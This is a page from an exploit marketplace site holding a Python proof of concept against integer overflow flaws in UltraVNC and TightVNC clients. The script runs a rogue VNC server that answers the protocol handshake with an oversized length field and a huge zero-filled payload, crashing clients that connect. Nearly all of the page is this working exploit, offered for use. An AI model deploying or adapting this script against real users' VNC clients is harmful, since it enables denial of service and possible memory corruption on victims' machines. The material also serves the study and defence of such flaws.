[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC

Author
Andres Luksenberg
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6747
Category
dos / poc
Date add
04-02-2009
Platform
unsorted
====================================================================
UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC
====================================================================





#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)
#
import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		print "Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)"

		clientsocket, clientaddres = serversocket.accept()
		
		data = 'RFB 003.003\n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = '\x00'
		clientsocket.sendall(data)

		data = '\x00\x00\x00\x75'
		clientsocket.sendall(data)
		data = '\x00' * int(0xffffff)

		clientsocket.sendall(data)

clientsocket.close()
serversocket.close()



#  0day.today [2024-11-15]  #